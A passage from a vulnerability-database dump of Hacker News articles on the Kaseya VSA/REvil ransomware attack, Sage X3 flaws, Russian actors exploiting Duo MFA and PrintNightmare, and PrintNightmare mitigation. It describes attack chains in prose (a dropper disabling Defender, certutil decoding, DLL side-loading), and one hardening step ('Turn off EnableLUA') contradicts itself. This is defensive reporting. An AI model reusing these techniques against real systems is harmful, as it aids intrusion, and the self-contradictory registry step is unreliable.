deploy ransomware on the networks of MSPs' customer networks. Then in [June 2019](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), the same group went after Webroot SecureAnywhere and Kaseya VSA products to infect endpoints with Sodinokibi ransomware.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T04:36:00", "type": "thn", "title": "Kaseya Releases Patches for Flaws Exploited in Widespread Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T10:46:11", "id": "THN:1812C7168898D0993D0783FDC775739F", "href": "https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[](<https://thehackernews.com/images/-Gnu9lfBaWJo/YObgWiseQ6I/AAAAAAAADIk/93QJ3ZLav6IR71KHp1O_I1V70dhS8n2ggCLcBGAsYHQ/s0/erp-software.jpg>)\n\nFour security vulnerabilities have been uncovered in the [Sage 
X3](<https://www.sage.com/en-us/sage-business-cloud/sage-x3/>) enterprise resource planning (ERP) product, two of which could be chained together as part of an attack sequence to enable adversaries to execute malicious commands and take control of vulnerable systems.\n\nThese issues were discovered by researchers from Rapid7, who notified Sage Group of their findings on Feb. 3, 2021. The vendor has since rolled out [fixes](<https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/148233/sage-x3-version-11-june-2021>) in recent releases for Sage X3 Version 9 (Syracuse 9.22.7.2), Sage X3 HR & Payroll Version 9 (Syracuse 9.24.1.3), Sage X3 Version 11 (Syracuse 11.25.2.6), and Sage X3 Version 12 (Syracuse 12.10.2.8) that were shipped in March.\n\nThe list of vulnerabilities is as follows -\n\n * **CVE-2020-7388** (CVSS score: 10.0) - Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component\n * **CVE-2020-7389** (CVSS score\" 5.5) - System \"CHAINE\" Variable Script Command Injection (No fix planned)\n * **CVE-2020-7387** (CVSS score: 5.3) - Sage X3 Installation Pathname Disclosure\n * **CVE-2020-7390** (CVSS score: 4.6) - Stored XSS Vulnerability on 'Edit' Page of User Profile\n\n\"When combining CVE-2020-7387 and CVE-2020-7388, an attacker can first learn the installation path of the affected software, then use that information to pass commands to the host system to be run in the SYSTEM context,\" the researchers [said](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>). 
\"This can allow an attacker to run arbitrary operating system commands to create Administrator level users, install malicious software, and otherwise take complete control of the system for any purpose.\"\n\n[](<https://thehackernews.com/images/-jQ30AM1BKTk/YObgpqqUBMI/AAAAAAAADIs/yUeM-dYpjsMVlO2etFKHLUeNqimy6uGrQCLcBGAsYHQ/s0/admin.jpg>)\n\nThe most severe of the issues is CVE-2020-7388, which takes advantage of an administrative service that's accessible over the internet to craft malicious requests with the goal of running arbitrary commands on the server as the \"NT AUTHORITY/SYSTEM\" user. The service in question is used for remote management of the Sage ERP solution through the Sage X3 Console.\n\nSeparately, the 'Edit' page associated with user profiles in the Sage X3 Syracuse web server component is vulnerable to a [stored XSS](<https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/>) attack (CVE-2020-7390), enabling the execution of arbitrary JavaScript code during '[mouseOver](<https://developer.mozilla.org/en-US/docs/Web/API/Element/mouseover_event>)' events in the 'First name', 'Last name', and 'Email' fields.\n\n\"If successful, however, this vulnerability could allow a regular user of Sage X3 to execute privileged functions as a currently logged-in administrator or capture administrator session cookies for later impersonation as a currently-logged-in administrator,\" the researchers said.\n\nSuccessful exploitation of CVE-2020-7387, on the other hand, results in the exposure of Sage X3 installation paths to an unauthorized user, while CVE-2020-7389 concerns a missing authentication in Syracuse development environments that could be used to gain code execution via command injection.\n\n\"Generally speaking, Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required,\" the researchers noted in the disclosure. 
\"Following this operational advice effectively mitigates all four vulnerabilities, though customers are still urged to update according to their usual patch cycle schedules.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T11:26:00", "type": "thn", "title": "Critical Flaws Reported in Sage X3 Enterprise Management Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390"], "modified": "2021-07-08T11:26:09", "id": "THN:071674FE55E0EC791A8A321B61E9ED63", "href": "https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": 
"[](<https://thehackernews.com/images/-amElwT4flB4/YOP-7QNm6uI/AAAAAAAADGc/CJfNcjNsvDcuA16PdqeS-uDGR5r9urDxgCLcBGAsYHQ/s0/kk.png>)\n\nU.S. technology firm Kaseya, which is firefighting the largest ever [supply-chain ransomware strike](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) on its VSA on-premises product, ruled out the possibility that its codebase was unauthorizedly tampered with to distribute malware.\n\nWhile initial reports raised speculations that REvil, the ransomware gang behind the attack, might have gained access to Kaseya's backend infrastructure and abused it to deploy a malicious update to VSA servers running on client premises, in a modus operandi similar to that of the devastating SolarWinds hack, it has since emerged that a never-before-seen security vulnerability ([CVE-2021-30116](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) in the software was leveraged to push ransomware to Kaseya's customers.\n\n\"The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\" the Miami-headquartered company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in the incident analysis. \"This allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya's VSA codebase has been maliciously modified.\"\n\nIn other words, while successful zero-day exploitation on Kaseya VSA software by itself isn't a supply-chain attack, taking advantage of the exploit to compromise managed service providers (MSPs) and breach their customers would constitute as one.\n\nIt's, however, unclear as to how the hackers learned of the vulnerabilities. 
The details of those flaws have not yet been publicly released, although Huntress Labs [revealed](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) that \"Cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers.\"\n\n[](<https://thehackernews.com/images/-M77M4RmcNEc/YOUxOS5ZdUI/AAAAAAAA4Sc/_p6iSb9UrLA1rb-HnPzBoLz2isflL5seACLcBGAsYHQ/s0/hack.jpg>) \n--- \nImage Source: [Cybereason](<https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles>) \n \nAbout 60 MSPs and 1,500 downstream businesses around the world have been paralyzed by the ransomware attack, according to the company's CEO Fred Voccola, most of which have been small concerns, like dental practices, architecture firms, plastic surgery centers, and libraries.\n\nHackers associated with the Russia-linked REvil ransomware-as-a-service (RaaS) group initially demanded $70 million in Bitcoins to release a decryptor tool for restoring all the affected businesses' data, although they have swiftly [lowered the asking price](<https://twitter.com/jackhcable/status/1411906687968161792>) to $50 million, suggesting a willingness to negotiate their demands in return for a lesser amount.\n\n\"REvil ransomware has been advertised on underground forums for three years and it is one of the most prolific RaaS operations,\" Kaspersky researchers [said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) Monday, adding \"the gang earned over $100 million from its operations in 2020.\"\n\nThe attack chain worked by first deploying a malicious dropper via a PowerShell script which was executed through Kaseya's VSA software.\n\n\"This script disables Microsoft Defender for Endpoint protection features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops a legitimate Microsoft 
binary (MsMpEng.exe, an older version of Microsoft Defender) and malicious library (mpsvc.dll), which is the REvil ransomware. This library is then loaded by the legitimate MsMpEng.exe by utilizing the [DLL side-loading technique](<https://attack.mitre.org/techniques/T1574/002/>),\" the researchers added.\n\nThe incident has also led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to offer mitigation guidance, urging businesses to enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T07:03:00", "type": "thn", "title": "Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T04:45:24", "id": "THN:6141B56028352C293B8E6D7F0948C55C", "href": "https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s0/Kaseya-Ransomware-Attack.jpg>)\n\nAmidst the massive [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) that triggered an infection chain compromising thousands of businesses on Friday, new details have emerged about how the notorious Russia-linked REvil cybercrime gang may have pulled off the unprecedented hack.\n\nThe Dutch Institute for Vulnerability Disclosure (DIVD) on Sunday [revealed](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>) it had alerted Kaseya to a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) that it said were being exploited as a conduit to deploy ransomware. The non-profit entity said the company was in the process of resolving the issues as part of a coordinated vulnerability disclosure when the July 2 attacks took place.\n\nMore specifics about the flaws were not shared, but DIVD chair Victor Gevers [hinted](<https://twitter.com/0xDUDE/status/1411478505641099265>) that the zero-days are trivial to exploit. 
At least 1,000 businesses are said to have been affected by the attacks, with victims identified in no less than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, according to ESET.\n\n[Kaseya VSA](<https://www.kaseya.com/products/vsa/>) is a cloud-based IT management and remote monitoring solution for managed service providers (MSPs), offering a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access via two-factor authentication.\n\n### REvil Demands $70 Million Ransom\n\nActive since April 2019, [REvil](<https://attack.mitre.org/software/S0496/>) (aka Sodinokibi) is best known for [extorting $11 million](<https://thehackernews.com/2021/06/beef-supplier-jbs-paid-hackers-11.html>) from the meat-processor JBS early last month, with the ransomware-as-a-service business accounting for about 4.6% of attacks on the public and private sectors in the first quarter of 2021.\n\n[](<https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s0/revil-ransomware-blog.jpg>)\n\nThe group is now asking for a record $70 million ransom payment to publish a universal decryptor that can unlock all systems that have been crippled by file-encrypting ransomware.\n\n\"On Friday (02.07.2021) we launched an attack on MSP providers. More than a million systems were infected. 
If anyone wants to negotiate about universal decryptor \u2013 our price is 70,000,000$ in BTC and we will publish publicly decryptor that decrypts files of all victims, so everyone will be able to recover from attack in less than an hour,\" the REvil group posted on their dark web data leak site.\n\n[](<https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s0/ransomware-attack.jpg>)\n\nKaseya, which has enlisted the help of FireEye to help with its investigation into the incident, [said](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) it intends to \"bring our SaaS data centers back online on a one-by-one basis starting with our E.U., U.K., and Asia-Pacific data centers followed by our North American data centers.\"\n\nOn-premises VSA servers will require the installation of a patch prior to a restart, the company noted, adding it's in the process of readying the fix for release on July 5.\n\n### CISA Issues Advisory\n\nThe development has prompted the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to [issue an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>), urging customers to download the [Compromise Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that Kaseya has made available to identify any indicators of compromise (IoC), enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n\n\"Less than ten organizations [across our customer base] appear to have been affected, and the impact appears to have been restricted to systems running the Kaseya software,\" Barry Hensley, Chief Threat Intelligence Officer at Secureworks, told The Hacker News via email.\n\n\"We have not seen evidence of the threat actors attempting to move laterally or propagate the ransomware through compromised networks. That means that organizations with wide Kaseya VSA deployments are likely to be significantly more affected than those that only run it on one or two servers.\"\n\nBy compromising a software supplier to target MSPs, who, in turn, provide infrastructure or device-centric maintenance and support to other small and medium businesses, the development once again underscores the importance of securing the software supply chain, while also highlighting how hostile agents continue to advance their financial motives by combining the twin threats of supply chain attacks and ransomware to strike hundreds of victims at once.\n\n\"MSPs are high-value targets \u2014 they have large attack surfaces, making them juicy targets to cybercriminals,\" said Kevin Reed, chief information security officer at Acronis. 
\"One MSP can manage IT for dozens to a hundred companies: instead of compromising 100 different companies, the criminals only need to hack one MSP to get access to them all.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T05:22:00", "type": "thn", "title": "REvil Used 0-Day in Kaseya Ransomware Attack, Demands $70 Million Ransom", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-06T04:52:17", "id": "THN:5B336156927E228EFBD090418D063D2D", "href": "https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:27", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account was un-enrolled from Duo due to a long period of inactivity, but had not yet been disabled in the NGO's Active Directory, thereby allowing the attackers to escalate their privileges using the PrintNightmare flaw and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies 
explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s0/Microsoft-PrintSpooler-Vulnerability.jpg>)\n\nThis week, **PrintNightmare** \\- Microsoft's Print Spooler vulnerability (CVE-2021-34527) was upgraded from a 'Low' criticality to a 'Critical' criticality.\n\nThis is due to a Proof of Concept published on GitHub, which attackers could potentially leverage for gaining access to Domain Controllers.\n\nAs we [reported earlier](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), Microsoft already released a patch in June 2021, but it wasn't enough to stop exploits. Attackers can still use Print Spooler when connecting remotely. You can find all you need to know about this vulnerability in this article and how you can mitigate it (and you can). \n\n**Print Spooler in a nutshell:** Print Spooler is Microsoft's service for managing and monitoring files printing. This service is among Microsoft's oldest and has had minimal maintenance updates since it was released. \n\nEvery Microsoft machine (servers and endpoints) has this feature enabled by default.\n\n**PrintNightmare vulnerability:** As soon as an attacker gains limited user access to a network, he will be able to connect (directly or remotely) to the Print Spooler. 
Since the Print Spooler has direct access to the kernel, the attacker can use it to gain access to the operating system, run remote code with system privileges, and ultimately attack the Domain Controller.\n\nYour best option when it comes to mitigating the PrintNightmare vulnerability is to disable the Print Spooler on every server and/or sensitive workstation (such as administrators' workstations, direct internet-facing workstations, and non-printing workstations).\n\nThis is what Dvir Goren's, hardening expert and CTO at [CalCom Software Solutions](<https://www.calcomsoftware.com/?utm_source=HN>), suggests as your first move towards mitigation.\n\nFollow these steps to disable the Print Spooler service on Windows 10:\n\n 1. Open Start.\n 2. Search for PowerShell, right-click on it and select the Run as administrator.\n 3. Type the command and press Enter: _Stop-Service -Name Spooler -Force_\n 4. Use this command to prevent the service from starting back up again during restart: Set-Service -Name Spooler -StartupType Disabled\n\nAccording to Dvir's experience, 90% of servers do not require Print Spooler. It is the default configuration for most of them, so it is usually enabled. As a result, disabling it can solve 90% of your problem and have little impact on production.\n\nIn large and complex infrastructures, it can be challenging to locate where Print Spooler is used.\n\nHere are a few examples where Print Spooler is required:\n\n 1. When using Citrix services,\n 2. Fax servers,\n 3. Any application requiring virtual or physical printing of PDFs, XPSs, etc. Billing services and wage applications, for example.\n\nHere are a few examples when Print Spooler is not needed but enabled by default:\n\n 1. Domain Controller and Active Directory \u2013 the main risk in this vulnerability can be neutralized by practicing basic cyber hygiene. It makes no sense to have Print Spooler enabled in DCs and AD servers. \n 2. 
Member servers such as SQL, File System, and Exchange servers. \n 3. Machines that do not require printing. \n\nA few other hardening steps suggested by Dvir for machines dependent on Print Spooler include:\n\n 1. Replace the vulnerable Print Spooler protocol with a non-Microsoft service. \n 2. By changing 'Allow Print Spooler to accept client connections', you can restrict users' and drivers' access to the Print Spooler to groups that must use it.\n 3. Disable Print Spooler caller in Pre-Windows 2000 compatibility group.\n 4. Make sure that Point and Print is not configured to No Warning \u2013 check registry key SOFTWARE/Policies/Microsoft/Windows NT/Printers/PointAndPrint/NoElevationOnInstall for DWORD value 1 and change it to 0.\n 5. Turn off EnableLUA \u2013 check registry key SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System/EnableLUA for DWORD value 0 and change it to 1.\n\nHere's what you need to do next to ensure your organization is secure:\n\n 1. Identify where Print Spooler is being used on your network. \n 2. Map your network to find the machines that must use Print Spooler.\n 3. Disable Print Spooler on machines that do not use it. \n 4. For machines that require Print Spooler \u2013 configure them in a way to minimize its attack surface. \n\nBeside this, to find potential evidence of exploitation, you should also monitor Microsoft-Windows-PrintService/Admin log entries. There might be entries with error messages that indicate Print Spooler can't load plug-in module DLLs, although this can also happen if an attacker packaged a legitimate DLL that Print Spooler demands.\n\nThe final recommendation from Dvir is to implement these recommendations through[ hardening automation tools](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=HN>). 
Without automation, you will spend countless hours attempting to harden manually and may end up vulnerable or causing systems to go down\n\nAfter choosing your course of action, a [Hardening automation tool](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=HN>) will discover where Print Spooler is enabled, where they are actually used, and disable or reconfigure them automatically.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T09:32:00", "type": "thn", "title": "How to Mitigate Microsoft Print Spooler Vulnerability \u2013 PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T15:05:22", "id": "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html", "cvss": {"score": 9.0, 
"vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T07:58:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e100/ransomware.jpg>)\n\nCybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). \"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with 